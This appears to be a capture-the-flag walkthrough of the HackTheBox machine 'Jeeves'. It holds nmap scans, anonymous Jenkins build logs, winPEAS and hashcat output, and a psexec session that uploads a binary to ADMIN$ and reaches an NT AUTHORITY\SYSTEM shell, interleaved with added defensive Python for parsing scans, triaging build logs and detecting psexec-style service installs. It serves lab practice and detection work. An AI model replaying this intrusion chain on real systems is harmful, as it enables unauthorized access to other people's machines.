┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=2000 10.10.10.63 -oG allports -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 07:01 CST
Nmap scan report for 10.10.10.63
Host is up (0.37s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
50000/tcp open  ibm-db2

Nmap done: 1 IP address (1 host up) scanned in 100.73 seconds
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80,135,445,50000 -sC -sV --min-rate=2000 10.10.10.63
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 07:07 CST
Nmap scan report for 10.10.10.63
Host is up (0.24s latency).

PORT      STATE    SERVICE      VERSION
80/tcp    open     http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp   filtered msrpc
445/tcp   filtered microsoft-ds
50000/tcp filtered ibm-db2
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.08 seconds
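The two scans above follow the usual two-phase pattern: a fast all-ports sweep written to a grepable file (-oG allports), then a targeted -sC -sV scan of only the ports that came back open. The glue between the two is normally done by hand; as an added example (not code from this writeup), the script below parses nmap's grepable format, keeps only ports in state "open", and builds the argv of the follow-up scan. The sample text is constructed to match the ports found on 10.10.10.63 above, with one closed port added so the state filter is exercised; the file name allports and the --min-rate value are taken from the page, everything else is the example's own.

```python
import re
import sys

# Constructed sample in nmap's grepable (-oG) format, shaped like the
# "allports" file the sweep above writes. Not the file from the page; a
# closed port is added so filtering by state actually does something.
SAMPLE_GREPABLE = (
    "# Nmap 7.94SVN scan initiated Sat Apr 27 07:01:02 2024 as: "
    "nmap -p- --min-rate=2000 -oG allports -Pn 10.10.10.63\n"
    "Host: 10.10.10.63 ()\tStatus: Up\n"
    "Host: 10.10.10.63 ()\tPorts: 80/open/tcp//http///, 135/open/tcp//msrpc///, "
    "445/open/tcp//microsoft-ds///, 50000/open/tcp//ibm-db2///, "
    "3389/closed/tcp//ms-wbt-server///\tIgnored State: filtered (65530)\n"
    "# Nmap done at Sat Apr 27 07:02:43 2024 -- 1 IP address (1 host up) "
    "scanned in 100.73 seconds\n"
)

# One -oG port entry: port/state/protocol/owner/service/rpc_info/version/
# State may be compound, e.g. open|filtered, hence [\w|]+.
PORT_RE = re.compile(r"(\d+)/([\w|]+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def open_ports(grepable):
    """Map host -> sorted list of (port, proto, service) for ports in state 'open'."""
    result = {}
    for line in grepable.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports: field runs up to the next tab-separated field (Ignored State:).
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        entries = result.setdefault(host, [])
        for port, state, proto, _owner, service, _rpc, _ver in PORT_RE.findall(ports_field):
            if state == "open":
                entries.append((int(port), proto, service))
        entries.sort()
    return result


def service_scan_argv(host, ports, min_rate=2000):
    """argv of the targeted -sC -sV scan, built from the parsed open-port list."""
    if not ports:
        raise ValueError("no open ports to scan on %s" % host)
    port_spec = ",".join(str(p) for p in sorted(set(ports)))
    return ["nmap", "-p" + port_spec, "-sC", "-sV", "--min-rate=%d" % min_rate, host]


if __name__ == "__main__":
    # Usage: python nmap_followup.py allports   (falls back to the sample text)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GREPABLE
    for host, entries in open_ports(text).items():
        print(" ".join(service_scan_argv(host, [p for p, _, _ in entries])))
```

The printed command can be pasted (with sudo) straight into the second step. One caveat the page's own output illustrates: the sweep reported 135, 445 and 50000 as open, but the follow-up scan seven minutes later reported them filtered. At --min-rate=2000 a Windows host or its firewall can start dropping probes, so when the two phases disagree, rescan those ports at a lower rate before concluding anything about SMB.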
Started by user anonymous
Building in workspace C:\Users\Administrator\.jenkins\workspace\test1
[test1] $ cmd /c call C:\Users\kohsuke\AppData\Local\Temp\jenkins7419465613522893143.bat

Started by user anonymous
Building in workspace C:\Users\Administrator\.jenkins\workspace\test1
[test1] $ cmd /c call C:\Users\kohsuke\AppData\Local\Temp\jenkins4410486682208148338.bat

Pinging 10.10.14.39 with 32 bytes of data:
Reply from 10.10.14.39: bytes=32 time=135ms TTL=63
Reply from 10.10.14.39: bytes=32 time=239ms TTL=63
Reply from 10.10.14.39: bytes=32 time=136ms TTL=63
Reply from 10.10.14.39: bytes=32 time=246ms TTL=63

Ping statistics for 10.10.14.39:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 135ms, Maximum = 246ms, Average = 189ms
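The build console output above carries the whole misconfiguration in three lines: the build was started by the anonymous user, Jenkins wrote the batch step to jenkins<digits>.bat under C:\Users\kohsuke\AppData\Local\Temp and ran it with cmd /c call, and the workspace sits under C:\Users\Administrator\.jenkins. The temp file lands in %TEMP% of the account the Jenkins service runs as, so the ping from 10.10.14.39 was sent by kohsuke, not Administrator. As an added example, not code from this page, the triage below pulls exactly those facts out of build logs. The first two log excerpts are the ones quoted above; the third is a constructed benign build for contrast.

```python
import re

# The first two excerpts are the "test1" console outputs quoted on this page;
# the third is a constructed scheduled build whose step is not a batch command.
SAMPLE_BUILD_LOGS = [
    "Started by user anonymous\n"
    "Building in workspace C:\\Users\\Administrator\\.jenkins\\workspace\\test1\n"
    "[test1] $ cmd /c call C:\\Users\\kohsuke\\AppData\\Local\\Temp\\jenkins7419465613522893143.bat\n",
    "Started by user anonymous\n"
    "Building in workspace C:\\Users\\Administrator\\.jenkins\\workspace\\test1\n"
    "[test1] $ cmd /c call C:\\Users\\kohsuke\\AppData\\Local\\Temp\\jenkins4410486682208148338.bat\n",
    "Started by timer\n"
    "Building in workspace C:\\Users\\Administrator\\.jenkins\\workspace\\nightly\n"
    "[nightly] $ git fetch --tags --force --progress -- https://git.example/app.git\n",
]

STARTED_RE = re.compile(r"^Started by (?:user (?P<user>.+)|(?P<other>.+))$", re.M)
WORKSPACE_RE = re.compile(r"^Building in workspace (?P<ws>.+)$", re.M)
STEP_RE = re.compile(r"^\[(?P<job>[^\]]+)\] \$ (?P<cmd>.+)$", re.M)
# An "Execute Windows batch command" step is written to jenkins<digits>.bat in
# %TEMP% of the service account and run via "cmd /c call".
BATCH_STEP_RE = re.compile(r"^cmd /c call (?P<path>.+\\jenkins\d+\.bat)$")
PROFILE_RE = re.compile(r"^[A-Za-z]:\\Users\\([^\\]+)\\")


def triage_build(log):
    """Who started the build, what ran, and which account it ran as."""
    started = STARTED_RE.search(log)
    workspace = WORKSPACE_RE.search(log)
    step = STEP_RE.search(log)
    info = {
        "started_by": (started.group("user") or started.group("other")) if started else None,
        "workspace": workspace.group("ws") if workspace else None,
        "job": step.group("job") if step else None,
        "command": step.group("cmd") if step else None,
        "service_account": None,
        "findings": [],
    }
    if info["started_by"] == "anonymous":
        info["findings"].append("build triggered by the anonymous user: unauthenticated Job/Build is allowed")
    m = BATCH_STEP_RE.match(info["command"] or "")
    if m:
        info["findings"].append("Windows batch step executed from " + m.group("path"))
        owner = PROFILE_RE.match(m.group("path"))
        if owner:
            # The temp script is created in the profile of the account Jenkins runs as.
            info["service_account"] = owner.group(1)
            ws_owner = PROFILE_RE.match(info["workspace"] or "")
            if ws_owner and ws_owner.group(1).lower() != owner.group(1).lower():
                info["findings"].append(
                    "JENKINS_HOME lives under %s's profile but the service runs as %s"
                    % (ws_owner.group(1), owner.group(1)))
    return info


def suspicious_builds(logs):
    """Indices of builds that were anonymous-triggered and ran a batch step."""
    return [i for i, log in enumerate(logs)
            if triage_build(log)["started_by"] == "anonymous"
            and triage_build(log)["service_account"] is not None]
```

Run over a job's build history this separates the attacker's two test1 builds from scheduled work, and the service_account value it recovers (kohsuke) is the same identity winPEAS later reports as the current user.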
Check if you have some admin equivalent privileges
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups
Current user: kohsuke
Current groups: Domain Users, Everyone, Users, Service, Console Logon, Authenticated Users, This Organization, Local account, Local, NTLM Authentication
=================================================================================================
JEEVES\Administrator: Built-in account for administering the computer/domain
    |->Groups: Administrators
    |->Password: CanChange-NotExpi-Req

JEEVES\DefaultAccount(Disabled): A user account managed by the system.
    |->Groups: System Managed Accounts Group
    |->Password: CanChange-NotExpi-NotReq

JEEVES\Guest(Disabled): Built-in account for guest access to the computer/domain
    |->Groups: Guests
    |->Password: NotChange-NotExpi-NotReq

Check if any interesting processes for memory dump or if you could overwrite some binary running
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes
cmd(3692)[C:\Windows\SysWOW64\cmd.exe] -- POwn: kohsuke
Command Line: cmd /c call C:\Users\kohsuke\AppData\Local\Temp\jenkins1222239407732559434.bat
* Append -w 3 to the commandline.
  This can cause your screen to lag.
* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
Started: Sun Apr 28 00:22:41 2024
Stopped: Sun Apr 28 00:22:59 2024
[*] Requesting shares on 10.10.10.63.....
[*] Found writable share ADMIN$
[*] Uploading file STnNhPDV.exe
[*] Opening SVCManager on 10.10.10.63.....
[*] Creating service LIeY on 10.10.10.63.....
[*] Starting service LIeY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whomai
'whomai' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cat C:/Users/Administrator/Desktop/root.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>
C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:/Users/Administrator/Desktop/root.txt
The syntax of the command is incorrect.

C:\Windows\system32> cd C:/Users/Administrator/Desktop/

C:\Users\Administrator\Desktop> ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,582,810,624 bytes free

C:\Users\Administrator\Desktop> type hm.txt
The flag is elsewhere.  Look deeper.

C:\Users\Administrator\Desktop> dir /Ah
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1
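The psexec output above is also the defender's evidence: a writable ADMIN$ share (so the caller already held administrator-level credentials or a hash), an eight-letter binary STnNhPDV.exe dropped into the share root (which is %SystemRoot%), and a four-letter service LIeY created through the service control manager and started, all of which land in the System log as event 7045 on the target. As an added example, not code from this page, the checker below scores 7045 records for that pattern. The records are constructed in the shape of a 7045 event; the first reuses the names printed above, the other two are benign installs made up for contrast, and the ADMIN$-to-%SystemRoot% mapping is the one assumption it leans on.

```python
import re

# Constructed records in the shape of Windows System log event 7045
# ("A service was installed in the system"). The first mirrors the service
# and binary names the psexec session above printed; the other two are
# benign installs added for contrast. None come from a real event log.
SAMPLE_7045 = [
    {"ServiceName": "LIeY",
     "ImagePath": "%SystemRoot%\\STnNhPDV.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "ssh-agent",
     "ImagePath": "C:\\Windows\\System32\\OpenSSH\\ssh-agent.exe",
     "StartType": "disabled", "AccountName": "LocalSystem"},
    {"ServiceName": "AcmeAgent",  # constructed third-party agent
     "ImagePath": "\"C:\\Program Files\\Acme\\AcmeAgent.exe\" --service",
     "StartType": "auto start", "AccountName": "LocalSystem"},
]

SERVICE_NAME_RE = re.compile(r"^[A-Za-z]{4}$")      # e.g. LIeY
IMAGE_NAME_RE = re.compile(r"^[A-Za-z]{8}\.exe$")   # e.g. STnNhPDV.exe


def image_location(image_path):
    """(parent_dir_lowercase, file_name) for a 7045 ImagePath value.

    Handles quoting, trailing arguments, %SystemRoot%, and a UNC path through
    the ADMIN$ share, which the target resolves to %SystemRoot% (assumption).
    """
    p = image_path.strip()
    if p.startswith('"'):
        p = p[1:].split('"', 1)[0]      # quoted path, arguments follow the quote
    else:
        p = p.split(" ", 1)[0]
    p = re.sub(r"^%systemroot%", r"C:\\Windows", p, flags=re.I)
    p = re.sub(r"^\\\\[^\\]+\\ADMIN\$", r"C:\\Windows", p, flags=re.I)
    parent, _, name = p.rpartition("\\")
    return parent.lower(), name


def indicators(rec):
    """(code, description) pairs for psexec-style traits in one 7045 record."""
    parent, name = image_location(rec["ImagePath"])
    found = []
    if parent == "c:\\windows":
        found.append(("drop_root", "binary sits directly in %SystemRoot%, the root of ADMIN$"))
    if SERVICE_NAME_RE.match(rec["ServiceName"]):
        found.append(("name4", "four-letter service name"))
    if IMAGE_NAME_RE.match(name):
        found.append(("image8", "eight-letter image name"))
    if rec["StartType"].lower() == "demand start" and rec["AccountName"] == "LocalSystem":
        found.append(("demand_system", "demand-start service running as LocalSystem"))
    return found


def flag_psexec_like(records):
    """Service names whose install looks like a psexec-style remote execution."""
    flagged = []
    for rec in records:
        codes = {c for c, _ in indicators(rec)}
        # Require the drop location plus at least one random-name trait; either
        # on its own matches legitimate installers too often.
        if "drop_root" in codes and codes & {"name4", "image8"}:
            flagged.append(rec["ServiceName"])
    return flagged
```

Pair the 7045 hit with the 5145 share-access event for ADMIN$ from the same source address to get the operator's host (10.10.14.39 in this session) and the account that authenticated, which is the part the psexec banner never shows.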